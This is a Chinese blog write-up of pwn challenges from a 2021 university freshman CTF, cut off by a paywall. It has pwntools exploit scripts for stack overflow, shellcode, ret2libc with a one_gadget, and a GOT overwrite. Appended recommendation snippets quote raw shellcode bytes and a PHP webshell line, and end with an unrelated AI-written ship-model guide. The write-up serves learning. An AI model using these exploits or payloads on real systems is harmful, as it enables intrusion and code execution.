SCU新生赛2021 pwn wp

最新推荐文章于 2022-11-16 21:02:45 发布
原创 最新推荐文章于 2022-11-16 21:02:45 发布 · 4.4k 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#pwn

本文总结了极客大挑战和SCU新生赛中的技术挑战,涉及栈溢出、基础shellcode编写、ret2libc技巧、UAF漏洞利用和Tcache攻击等,通过实例展示了如何解决和利用这些技术点。

前段时间的极客大挑战2021和2021年的SCU新生赛,最后一道题都没有做出来,作为一枚大二学长确实应该反省一下自己了。太菜了呜呜呜。极客大挑战因为打太久了,题目都快忘记了,就不写wp了。

ret2text

简单的栈溢出,pwn里的hello world。

from pwn import *

r = process("/mnt/hgfs/ubuntu/stackoverflow")
elf = ELF("/mnt/hgfs/ubuntu/stackoverflow")
payload = b'a'*0x38+p64(elf.symbols["backdoor"])
r.recvuntil(b"Do you know stack overflow and ret2text?")
r.sendline(payload)
io.interactive()

ret2shellcode

最基础的shellcode,可以自己写,也可以直接用pwntools里的shellcraft模块

from pwn import *
context(arch="amd64",os="linux")
r = process("/mnt/hgfs/ubuntu/ret2shellcode")
r.recvuntil(b"Your input will be saved at ")
shellcode_addr = int(r.recvuntil(b'\n'),16)
shellcode = asm(shellcraft.sh())
r.recvuntil("Input: ")
payload = shellcode.ljust(0x88,b'a')+p64(shellcode_addr)
r.sendline(payload)
r.interactive()

quiz

在线测试题,主要考察整数溢出和汇编的问题。

ret2libc

链接:https://pan.baidu.com/s/1T94IbzZpAWCherOfZl5xQw
提取码:F1re

checksec一下,除了canary保护外全开。

思路

0x1地址泄露

1

choice选择1后可以泄露一些地址,其中泄露了一个函数的地址,和puts函数的地址,可以通过这两个得到elf文件基址和libc基址。

0x2栈溢出

2

然后就是choice选择2后一个明显的栈溢出漏洞。

不过这道题有点搞的是,我用system+/bin/sh的方式不能getshell,最后用one_gadget成功getshell。最后注意用一个ret指令平衡栈帧。

exp

from pwn import *
libc = ELF('/mnt/hgfs/ubuntu/ret2libc/libc-2.23.so')
# r = process('/mnt/hgfs/ubuntu/ret2libc/ret2libc')

r.recvuntil("Your choice: ")
r.sendline(b'1')
r.recvuntil("You need to figure it out:")
r.recvuntil("0xdeadbeef ")
elf_addr = int(r.recv(14),16)
elf_base = elf_addr-0x13d3
r.recv(1)
puts_addr=int(r.recv(14),16)
print(hex(puts_addr))
libc_base=puts_addr-libc.symbols["puts"]
system_addr = libc_base+libc.symbols["system"]
bin_sh = 0x18ce57
one_gadget = libc_base+0xf03a4
pop_rdi = 0x1613+elf_base
ret = elf_base+0x101a
print("elf_base:"+hex(elf_base))
print("libc_base: "+hex(libc_base))
r.recvuntil("Your choice: ")
# payload = b'a'*0x18+p64(ret)+p64(pop_rdi)+p64(bin_sh)+p64(system_addr)
payload =b'a'*0x18+p64(ret)+p64(one_gadget)
r.sendline(b'2')
r.recvuntil("input: ")
r.sendline(payload)
r.interactive()

got_it

链接:https://pan.baidu.com/s/1V9_FA8XIHravKt9ZtXhQIw
提取码:F1re

checksec一下,除了RELEO保护,其他保护全开。

函数定义了一个数组,数组储存了几个学pwn的经典网站,函数有三个功能:

  • show:展示数组内某一个网站的网址。

  • edit:修改某一个网址的内容。但是可以看到输入长度0x12大于其数组元素长度0x8,存在溢出。

  • exit:退出程序。

思路

0x1溢出

3

存在0x8的溢出长度。

0x2控制函数指针

4

其中0x36E0后储存的是数组变量的地址。

而0x36E0前储存的是数组变量。

结合之前我们发现的0x8的溢出长度,可以对0x36D0处最后一个网址使用edit函数,可覆写到储存第一个数组元素的指针。

0x3 pie绕过,改写GOT表

由于程序未开RELEO保护,我们可以考虑改写函数GOT表,又由于程序开了pie保护,我们打算用partial write绕过。

5

发现atoi_addr与第一个函数指针之间只有最后一个字节不一样。因此我们只用覆写指针第一个字节为’\x40’。利用show函数泄露函数真实地址,从而计算出libc基址,然后再edit数组第一个元素,即可把atoi_got改写为one_gadget的值。

exp

from pwn import *
# r = process('/mnt/hgfs/ubuntu/got_it/got_it')
elf = ELF('/mnt/hgfs/ubuntu/got_it/got_it')
libc = ELF('/mnt/hgfs/ubuntu/got_it/libc-2.23.so')

def show(id):
    r.recvuntil("> ")
    r.sendline(str(1))
    r.recvuntil("which? ")
    r.sendline(str(id))

def edit(id,content):
最低0.47元/天 解锁文章
pwn题shellcode收集
lifanxin的博客
02-25 5764
Write Upshellcode shellcode 这里对pwn中使用到的shellcode做了一个汇总,方便大家参考和使用。 # 32位 短字节shellcode --> 21字节 \x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\xcd\x80 # 32位 纯ascii字符shellcode PYIIIIIIIIIIQZVTX30VX4AP0A3HH0A00ABAABTAAQ2AB2BB0
2021dasctf七月 pwn题解复现(strdup,md5,protect,setcontext)
weixin_46521144的博客
08-09 1201
前言:算是第一次参加自己觉得能力匹配的比之前的0ctf,tctf的,感觉自己就像个混子,2021参加的时候全程都在学没学过的堆,所以其实也没觉得自己能力赶得上。然而第一次打比嘛,总归是不可能会做的,不过也算是知道了,比也没有想象中的那么恐怖。 本篇文章参考的wp https://kr0emer.com/2021/08/04/DASCTF%20July%20X%20CBCTF%204th%20pwn/ Easyheap 保护全开,也开了沙箱,但是同时也开了一块RWX的段,地址是固定的0x233300
2021 强网杯 [强网先锋] shellcode
yongbaoii的博客
06-23 1286
就是写入shellcode跑就行。但是shellcode不能有小于’\x1f’,也不能有等于‘\x7f’。问题的关键在于开了沙箱。 只能使用这些系统调用。
ciscn2021pwn部分wp
eeeeeight的博客
05-17 1350
ciscn2021 感谢wepn的队友 Column: May 17, 2021 pwny: 首先ida看一眼发现read文件描述符全是3, 好像是读个随机数, 然后我们在3的地址上连着用Write读两次就可以把他变成0, 就可以写入内存了, 后面就是数组越界写, 负数可以往前面读读出libc偏移和pie偏移, 在得到libc之后可以获得环境变量environ的地址, 之后通过(libc_base+libc.sym[‘environ’]-pie_base-0x202060)/8, 就可以得到其位置是数组
2021 天翼杯 pwn ezshell
yongbaoii的博客
09-24 1201
逻辑简单,开了一个可以rwx的页,我们输入一段shellcode,绕过一些检查,开了沙箱,最后执行它。 一点一点来,首先我们输入shellcode之后函数__ctype_b_loc函数是干嘛的? 我们去读源码,在ctype/ctype.h #ifndef _ISbit /* These are all the characteristics of characters. If there get to be more than 16 distinct characteristics, many.
SCUCTF2020部分writeup
博客
06-21 1261
SCUCTF2020部分writeup MISC 专 业 团 队 binwalk -e Daning.png 提取出word文档 scuctf{19cc63ff-50b9-4254-a997-89d613290918} 记录 flag{b80e3ba4-055f-4c26-9482-23dc46424852} APU的犯罪证据 上传的shell <?php session_start(); function fastpow($a,$b,$c) { if($b==0) ret
6.4校wp
shikaku_的博客
06-06 1799
web入门 web 入门 f12查看源码在网络里找到flag即可
2021 DASCTF Sept X 浙江工业大学秋季挑战 pwn hehepwn
yongbaoii的博客
09-27 474
利用格式化字符串泄露canary再ret2libc就可以了。 开了沙箱,可以先mprotect一下,再用shellcode来orw。 exp from pwn import* context.log_level='debug' context.arch='amd64' context.os = "linux" context.terminal = ["tmux", "splitw", "-h"] local = 1 if local: r = process('./1111111') els.
英招杯 pwn2(ret2shellcode)
qq_53928256的博客
11-16 464
由于程序运行时,即输出了输入值s的存放首地址,我们输入的首地址与shellcode之间的距离是0x3c-0x28=0x14,故只需返回s的首地址加上0x14即可;我们分析main函数的时候可以看到栈中的s距离rbp还有一段距离,且程序的NX保护未开启,我们可以考虑写入shellcode在栈中执行。根据图中与rbp的偏移,我们相对比较容易的出var_30对应的变量为v5,var_8对应的变量为v10。在网上我们可以查到相对较短的syscall系统调用的shellcode为23字节,满足我们所需的要求。
2021第十四届全国大学生信息安全竞WP(CISCN)-- pwn部分
热门推荐
lifanxin的博客
05-17 1万+
CISCN_2021_WP概述ciscn_2021_lonelywolf总结 概述   作为学习不到一年的练习生,今年第一次参加国,本以为题目会比较温柔,但是最后只做出了一道pwn题,本来还有两道pwn题是有机会的,但还是缺少一些知识或者技巧吧,没做出来,然后就结束了。本次国pwn题出了一道arm 64位结构的,其余都是正常的linux下pwn题,使用libc-2.27.so,有一道考了沙箱机制。 ciscn_2021_lonelywolf   ciscn_2021_lonelywolf   libc-
pwn刷题num30----栈溢出修改栈上参数 或 mprotect修改内存权限 + ret2shellcode
tbsqigongzi的博客
04-27 2315
BUUCTF-PWN-get_started_3dsctf_2016 首先查保护–>看链接类型–>赋予程序可执行权限–>试运行 32位程序,小端序 开启部分RELRO-----got表仍可写 未开启canary保护-----存在栈溢出 开启NX保护-----堆栈不可执行 未开启PIE-----程序地址为真实地址 静态链接 Qual a palavrinha magica? 中文意思是 什么是神奇的词? 很奇怪,ida看一下伪代码 栈溢出,gets函数输入字符串给v4,未限制输入的
强网杯2021CTF 强网先锋shellcode侧信道攻击复现
qq_39948058的博客
08-27 1715
前言:由于个别原因这个比忘记参加了,所以后挑选了一道测信道攻击的题来进行复现,这个题开启了沙盒,采用测信道爆破flag,大概思路:使用retf切换到32位open来进行open('./flag'),retfq再回到64位的write和read就可以了,此题禁用了open所以使用32位的open,如果禁用了write就使用32位的write,同理,具体代码分析,懂汇编就能看懂这里就不赘述了,参考了别的大佬的exp,大概就是这样写的,至于系统调用号可以参考前篇调用号文章 exp: from pwn i
字符串溢出(pwn溢出)--ret2shellcode
莫慌的博客
09-26 2360
pwn 入门
[ACTF2020 新生] web题-Upload
BROTHERYY的博客
07-09 590
复现环境:buuoj.cn 开题漆黑一片,注意观察中间,有个灯泡,鼠标移动上去以后会有上传的提示 查看下页面代码,发现有前端js验证 删除以后,发现很多都无法上传,最后phtml能够上传成功,这里可以不用GIF文件头 访问地址,蚁剑连接 也可以直接在phtml里面添加 <script language='php'>system('cat /flag');</script> 直接在访问上传的文件名的时候就读出flag. ...
BUUCTF——web([极客大挑战 2019]Secret File、[ACTF2020 新生]Exec、[极客大挑战 2019]LoveSQL)
LizePing_的博客
07-16 1273
BUUCTF-web[极客大挑战 2019]Secret File做题思路[ACTF2020 新生]Exec做题思路[极客大挑战 2019]LoveSQL做题思路 [极客大挑战 2019]Secret File 做题思路 所以说,江路远 是谁啊?? 根据元素里面提示,我们去这个页面看一看 有点恐怖啊兄弟们,来到了这个页面。我们继续深究下 点secret,接着看,。 然后他告诉查阅结束,关键提示点来了啊。他说没看清???那肯定是我们忽略了什么。 再来一遍,。这回我们抓包。看看每个包里的内容。在一个重
BUUCTF:[ACTF新生2020]swp
末初 · mochu7
07-23 4941
BUUCTF:[ACTF新生2020]swp
一道栈溢出题和pwntools及gdb的简单使用
qq_43474199的博客
09-25 1791
题目下载地址:https://pan.baidu.com/s/1RZtRKY89dzZjXlXVvbqFwA 密码:5wq0 好,让我们进入这道题 首先,我们先运行一下这道题不废话,直接checksec检查该程序。 可以看到,这道题的保护信息,没有PIE也没有Stack上的金丝鸟,这个程序是64位。 我们拉入IDA看一眼 这是main函数的伪C代码: 可以看到,该程序我们输入1,2,3可以分别...
bugku pwn5
Ceciiiilia的博客
04-18 455
1、有字符串格式化漏洞,通过该漏洞可以打印出栈里rip上libc_start_main的真实地址(需要算出偏移) 2、有libc_start_main的真实地址,即找到该地址在lib表内相对于lib_base真实地址的偏移,及system和bin/sh相对于libc_base的偏移 3、lib_base_addr加上system在lib表中的偏移,即可找到system的真实地址,lib_bas...
泄露libc
inquisiter
01-12 1692
pintf泄露libc 虽然存在格式化字符串漏洞,并且GOT表可写,但是程序使用的是printf_chk函数。会检测出形如&amp;quot;%n&amp;quot;和&amp;quot;%12$p&amp;quot;这种利用方式。 考虑到main函数由libc_start_main调用,因此栈上的返回地址是一个libc中的地址,利用格式化字符串漏洞能泄露出libc的基址。 “%p::%p::%p::%p::%p::%p::%p::%p”。第8个%p就能打印出l
scu的船模比给新手的学习路线
最新发布
03-20
<think>嗯,用户问的是SCU的船模比新手学习路线。首先,我需要明确SCU是指四川大学,对吧?船模比通常涉及设计、建造和操控模型船,可能包括竞速、载重或创意设计等类别。新手需要从哪些方面入手呢? 首先,用户是新手,可能需要基础知识的铺垫。比如,了解船模的基本类型,比的规则,评分标准等。然后,可能需要学习流体力学、材料科学、电子控制等相关知识。但作为新手,直接接触这些理论可能有点难,应该分阶段来。 接下来,考虑实践部分。船模制作需要动手能力,可能需要工具使用、材料选择、组装技巧等。然后测试和优化,这部分可能涉及调试动力系统、平衡性、稳定性等。此外,操控技巧也很重要,尤其是遥控船模的话,需要练习操控手法。 团队合作也是关键,比通常需要团队协作,分工比如设计、制作、测试、操控等。所以,学习路线可能需要包括团队协作的技巧。 另外,时间规划也是一个方面,比准备周期可能较长,如何安排学习、制作、测试的时间。还要考虑资源获取,比如学校是否有相关社团、导师指导,往届资料参考等。 可能还需要分阶段,比如第一阶段理论学习,第二阶段实践操作,第三阶段测试优化,第四阶段模拟比。每个阶段设定具体的目标和任务。 需要检查是否有遗漏的点,比如安全注意事项,或者常见问题解决方法。例如,船模漏水、动力不足、控制失灵等,如何应对。 还要考虑如何获取学习资源,推荐书籍、在线课程、论坛等。可能四川大学有相关的社团或往届参队伍,可以提供经验分享。 最后,整合这些内容,结构清晰,分步骤呈现,让新手能够循序渐进地学习和准备比。</think>以下是针对四川大学(SCU)船模比新手的系统学习路线,分为四个阶段,帮助循序渐进掌握关键技能: --- ### **阶段一:基础认知(1-2周)** 1. **比规则解析** - 研究事官方文件,明确评分标准(速度/载重/设计创新等) - 了解船体尺寸、动力限制(如是否允许使用特定电机或推进器) 2. **流体力学入门** - 学习基本概念:浮力公式 $F_b = \rho g V$、阻力分类(摩擦阻力/兴波阻力) - 理解船型与阻力的关系(尖底船 vs 平底船) 3. **材料与工具认知** - 常用材料:轻木、ABS塑料、碳纤维的强度/重量比 - 工具清单:切割工具(激光切割机)、粘合剂(环氧树脂)、电子焊接设备 --- ### **阶段二:设计实践(3-4周)** 1. **船型设计模拟** - 使用Free!ship或Fusion 360进行船体建模 - 优化长宽比:$$L/B > 4$$(高速船)或 $$L/B < 3$$(稳定性优先) 2. **动力系统匹配** - 计算推进效率:$$\eta = \frac{P_{输出}}{P_{输入}}$$ - 实验不同电机(如550有刷电机)与螺旋桨组合的推力曲线 3. **原型制作测试** - 3D打印或手工制作1:10缩小模型 - 进行静水阻力测试(拖拽实验)与重心位置调整 --- ### **阶段三:系统优化(2-3周)** 1. **电子控制系统** - 学习Arduino/PWM调速原理:$$D = \frac{t_{on}}{T}$$(占空比公式) - 安装无线图传系统(建议5.8GHz频段降低延迟) 2. **结构强度验证** - 使用有限元分析软件(如ANSYS)模拟船体应力分布 - 关键指标:龙骨最大应力值 $$\sigma_{max} < \sigma_{yield}$$ 3. **流体性能提升** - 添加导流鳍片降低兴波阻力 - 测试不同吃水深度下的阻力系数 $C_d$ --- ### **阶段四:竞准备(1-2周)** 1. **全系统联调** - 动力-控制联调:确保电机响应延迟 < 0.1s - 制定应急预案(如防水处理、备用电源切换) 2. **操控特训** - 设置S型绕桩、急停转向等训练科目 - 分析操控数据:$$ \theta_{舵角} \propto v^2/R$$(转弯半径公式) 3. **文档整理** - 制作技术报告书(需包含设计计算书、测试数据表) - 准备答辩PPT(重点展示创新点:如新型推进器布局) --- ### **资源推荐** 1. **理论教材** - 《船舶原理(上册)》- 重点阅读阻力与推进章节 - MIT OpenCourseWare:2.017J《海洋系统设计》 2. **实验设备** - 学校工坊:3D打印机、水槽实验装置 - 低成本替代:用鱼缸+染色液观察流线 3. **往届案例** - 联系SCU工程创新社团获取往届技术报告 - 分析冠军作品:2021年采用双体船+水翼设计提升稳定性 --- **关键提示**:建议每周举行2次团队复盘会议,使用PDCA循环(计划-执行-检查-改进)持续优化方案。遇到技术瓶颈时,优先考虑简化设计(如用差速转向替代独立舵机)。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值